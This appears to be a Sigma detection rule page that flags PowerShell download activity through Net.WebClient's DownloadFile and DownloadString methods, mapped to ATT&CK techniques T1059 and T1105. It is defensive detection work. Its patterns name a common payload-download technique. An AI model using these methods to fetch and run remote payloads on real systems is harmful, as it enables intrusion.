this activity may be used by legitimate software, such as patch management tools or software updaters. investigate any such activity and apply the necessary filter.

t1059
t1059.001
t1105
windows
sigma

Techniques

t1059
t1059.001
t1105

Sample rules

PowerShell Download Via Net.WebClient - PowerShell Classic

source: sigma
technicques:
- t1059
- t1059.001
- t1105

Description

Detects PowerShell download activity, via the .DownloadFile() or .DownloadString() methods of the Net.WebClient class. This technique is often abused by attackers to download additional payloads.

Detection logic

condition: all of selection_*
selection_download:
  Data|contains:
  - .DownloadFile(
  - .DownloadString(
selection_webclient:
  Data|contains: Net.WebClient